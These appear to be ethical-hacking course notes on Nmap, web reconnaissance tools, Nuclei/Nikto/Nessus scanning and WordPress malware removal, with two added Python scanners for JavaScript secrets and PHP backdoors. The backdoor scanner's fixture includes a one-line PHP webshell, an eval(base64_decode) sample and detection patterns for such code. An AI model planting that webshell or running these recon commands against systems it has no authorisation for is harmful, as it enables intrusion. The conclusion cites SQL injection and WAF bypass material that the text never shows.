Nmap is an open-source tool for network discovery, port scanning, and,
through its scripting engine, vulnerability detection.

How It Works:

Some Nmap flags:

-sV = detect the version of the service listening on each open port.
-p = port(s) to scan. There are 65535 TCP ports (and as many UDP ports);
     not all are open on a host, which is why identifying the specific open
     ports matters. Without -p, Nmap scans the 1000 most common ports.
-sC = run the default script set (the same as --script=default).
-T = timing template, from -T0 (slowest) to -T5 (fastest); -T4 is common.
-Pn = skip host discovery (the ping probe) and treat every target as online.
-oN = save the scan result to a normal text file.
Recon for Web Applications: Classes 20, 22, 26

Recon
1. Introduction to Web Application Reconnaissance
Reconnaissance (recon) is the systematic process of gathering intelligence
about a target web application to identify vulnerabilities, attack surfaces,
and potential entry points. This phase is critical for ethical hackers to map
out weaknesses before malicious actors exploit them. Below is a
structured breakdown of recon stages and tools.

1. Initial Recon
Objective: Collect basic information about the target (IP ranges, domains,
DNS records).
Tools:
Censys: censys search "domain:example.com"
Shodan: identifies exposed servers, databases, and IoT devices.
DNSdumpster: maps DNS records and subdomains.
WHOIS: retrieves domain registration details (owner, creation date).

2. Technology Discovery
Objective: Determine the tech stack (frameworks, CMS, servers).
Tools:
Wappalyzer: browser extension detecting the technologies a site uses.
BuiltWith: profiles backend infrastructure.
WhatWeb: CLI tool for server and script detection.

3. Subdomain Discovery
Objective: Uncover subdomains (admin.example.com, api.example.com).
Tools:
subfinder: passive subdomain enumeration from public sources.
An illustrative case: a 2023 bug bounty program uncovered
dev.internal.example.com via subfinder, leading to an exposed Jenkins server.

4. URL Discovery
Objective: Compile all accessible URLs (endpoints, archived pages).
Tools:
Katana: crawls websites recursively.
katana -u https://example.com

5. Parameter Discovery
Objective: Identify input parameters for testing.
Tools:
ParamSpider: extracts parameters from URLs.
paramspider -d example.com
Gf-Patterns: filters URLs for parameters associated with specific
vulnerability classes (SQLi, XSS, LFI).

6. Verify Active Items
Objective: Confirm live hosts/endpoints and filter out dead links.
Tools:
httpx: fast HTTP toolkit for probing URLs.
httprobe: checks which domains answer on HTTP/HTTPS.

7. Visualization
Objective: Generate visual reports (screenshots, network maps).
Tools:
Aquatone: captures screenshots and organizes data.

8. JavaScript Analysis
Objective: Scan client-side code for secrets (API keys, tokens) and for
endpoints the UI never links to.
Tools:
SecretFinder: python3 SecretFinder.py -i https://example.com -o cli
JSScanner: detects endpoints and vulnerabilities in JS files.

9. File and Directory Discovery
Objective: Find hidden files (backup.zip, config.php).
Tools: ffuf: fast web fuzzer.
ffuf -w wordlist.txt -u https://example.com/FUZZ

10. Wordlists
Objective: Use curated payloads for brute-forcing.
Resources:
SecLists: default wordlist repository.
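What stage 8 (JavaScript analysis) is looking for, in code: a small scanner of the SecretFinder kind, written here as an added example and not taken from the thesis or from SecretFinder itself. The JavaScript bundle is constructed, the AWS key is Amazon's documented example key and the other values are made up; the patterns cover three secret formats plus relative endpoints and absolute URLs, which is enough to show how such tools turn a bundle into a list of things to investigate.

```python
import re

# Constructed JavaScript bundle with planted findings (no real credentials).
SAMPLE_JS = r"""
const api = "https://api.example.com/v1";
const AWS_KEY = "AKIAIOSFODNN7EXAMPLE";
var cfg = { token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIn0.abcdefghijklmnopqrstuvwxyz012345" };
fetch("/api/internal/users?id=1");
fetch(api + "/admin/export");
const googleKey = "AIzaSyA-1234567890abcdefghijklmnopqrstu";
"""

# Secret formats: AWS access key IDs, Google API keys, and JWTs (three parts).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z\-_]{35}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b"),
}
# Quoted relative paths ("/api/...") and absolute URLs.
ENDPOINT_PATTERN = re.compile(r"""["'](/[A-Za-z0-9_\-./?=&]+)["']""")
URL_PATTERN = re.compile(r"""["'](https?://[^"'\s]+)["']""")


def scan_js(source):
    """Return one finding per match: type, line number and the matched value."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pat in SECRET_PATTERNS.items():
            for m in pat.finditer(line):
                findings.append({"type": name, "line": lineno, "value": m.group(0)})
        for m in ENDPOINT_PATTERN.finditer(line):
            findings.append({"type": "endpoint", "line": lineno, "value": m.group(1)})
        for m in URL_PATTERN.finditer(line):
            findings.append({"type": "url", "line": lineno, "value": m.group(1)})
    return findings


def summarize(findings):
    """Group the values by finding type, keeping file order."""
    out = {}
    for f in findings:
        out.setdefault(f["type"], []).append(f["value"])
    return out


if __name__ == "__main__":
    for f in scan_js(SAMPLE_JS):
        print(f"line {f['line']:2d}  {f['type']:18s} {f['value']}")
```

A hit is a lead, not a finding: keys in client-side code are sometimes intentionally public (a Google Maps browser key restricted by referrer), so the next step is to check what each one is allowed to do, and the /api/internal and /admin paths go straight into the directory and parameter stages that follow.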
Class 27 & 34: VAPT by Nuclei, Nikto and Nessus

Introduction to VAPT
Vulnerability Assessment and Penetration Testing (VAPT) combines
automated scanning (VA) with manual exploitation and validation (PT) to
identify and confirm security weaknesses. This section covers three widely
used tools: Nuclei (rapid template-based scanning), Nikto (web server
analysis), and Nessus (enterprise-grade vulnerability management).

1. Nuclei: scans for CVEs, misconfigurations, and exposures using
community-driven templates.

How It Works:
Target input: provide URLs, domains, or IPs.

Command Example:
nuclei -u https://example.com -t cves/ -severity critical,high

Illustrative output (the CVE identifier is a placeholder, not a real
finding):
[critical] [CVE-2023-1234] SQL Injection @ https://example.com/search?q=1
[high] [exposed-panel] Admin Dashboard @ https://example.com/admin

2. Nikto: web server vulnerability scanner.
Identifies web server flaws (outdated software, risky headers, dangerous
default files).

Command Example: nikto -h https://example.com -Display 1234
(-Display 1234 shows redirects, cookies received, all 200 responses, and
URLs that require authentication.)

3. Nessus: scans networks, cloud, and OT systems for vulnerabilities and
compliance gaps.

How It Works:

Scan setup: Advanced Scan > configure ports and plugins.

Start scan:
nessuscli scan --policy "Web App Audit" --targets example.com
(Nessus scans are normally created and launched from the web interface or
its REST API; check the nessuscli help for your version before relying on
this command, as the available subcommands vary.)
Freelancing with WordPress Malware Removal Service: Classes 21, 23, 30

WordPress Install

Part 1: Manual WordPress Installation

Prepare your environment
Download WordPress
Upload the WordPress files
Create a MySQL database
Configure wp-config.php
Run the WordPress installation script
Secure your installation

Malware Removal:

Part 2: Manual Malware Removal

Identify the malware
Back up your website
Put your site in maintenance mode
Remove malicious files, checking in turn:
1. wp-content/uploads
2. wp-content/themes
3. wp-content/plugins
4. Root directory
Clean infected files
Check the database
Update everything
Change passwords
Reinstall WordPress core files
Scan again
Harden security
Remove maintenance mode
Monitor your site
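A scanner for the "Identify the malware" and "Remove malicious files" steps above, as an added example that is not from the thesis. It walks a wp-content tree and reports two things: any PHP file under uploads/ (WordPress stores media there, never code) and, in any PHP file, three indicators that commonly mark injected backdoors: eval() of decoded or decompressed data, a variable used as a function name and fed from a request parameter, and include/require of a remote URL. The wp-content tree, including the planted samples, is constructed in a temporary directory; the indicator list is deliberately short and would need tuning for real engagements.

```python
import os
import re
import shutil
import tempfile

# Constructed indicator set for this example; real scanners carry far more.
INDICATORS = {
    "eval_of_decoded_data": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\("),
    "dynamic_function_call": re.compile(
        r"\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\["),
    "remote_include": re.compile(
        r"(include|require)(_once)?\s*\(?\s*['\"]https?://"),
}
PHP_SUFFIXES = (".php", ".phtml")


def scan_wp_content(wp_content):
    """Return sorted (relative path, indicator) pairs for everything suspicious."""
    findings = set()
    for dirpath, _, files in os.walk(wp_content):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, wp_content)
            is_php = name.lower().endswith(PHP_SUFFIXES)
            # Structural check: executable code in the media directory.
            if rel.split(os.sep)[0] == "uploads" and is_php:
                findings.add((rel, "php_in_uploads"))
            if not is_php:
                continue
            with open(path, errors="replace") as f:
                src = f.read()
            for label, pat in INDICATORS.items():
                if pat.search(src):
                    findings.add((rel, label))
    return sorted(findings)


def build_fixture():
    """Constructed wp-content tree: a clean plugin, a backdoored theme file, a
    webshell dropped into uploads, and an ordinary image (sample text only)."""
    root = tempfile.mkdtemp()
    files = {
        "plugins/hello/hello.php": "<?php function hello() { return 'hi'; }",
        "themes/twentyx/functions.php":
            "<?php\nadd_action('init', 'x');\neval(base64_decode('ZWNobyAxOw=='));",
        "uploads/2025/03/image.jpg.php": "<?php $f = $_GET['f']; $f($_GET['c']);",
        "uploads/2025/03/photo.jpg": "not really a jpeg, just sample bytes",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(body)
    return root


def demo():
    root = build_fixture()
    try:
        return scan_wp_content(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, label in demo():
        print(f"{label:22s} {rel}")
```

The uploads hit needs no pattern at all, which is why that directory is first in the list above: denying PHP execution under wp-content/uploads at the web server level removes the most common dropper location outright. For themes and plugins, the page's later step of reinstalling clean copies is more reliable than editing a flagged file by hand, since a scanner this small will miss variants.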
Conclusion: I would like to say that this course has explored the
multifaceted domain of cybersecurity and ethical hacking, providing a
comprehensive understanding of vulnerabilities, exploitation techniques,
and mitigation strategies. From mastering manual SQL injection and WAF
bypass techniques to implementing WordPress malware removal workflows, the
research underscores the critical need for proactive security measures in
an increasingly digital world. The practical applications of these skills,
whether in freelancing, penetration testing, or ethical hacking, highlight
the importance of continuous learning and adaptation to counter evolving
threats.

As cyberattacks grow in sophistication, the insights gained from this study
serve as a foundation for building safer, more resilient digital ecosystems.
The ethical responsibility of leveraging these skills for the greater good
cannot be overstated. By fostering a culture of collaboration, innovation,
and relentless curiosity, we can collectively rise to the challenges of
today's dynamic digital landscape and secure a safer future for all.
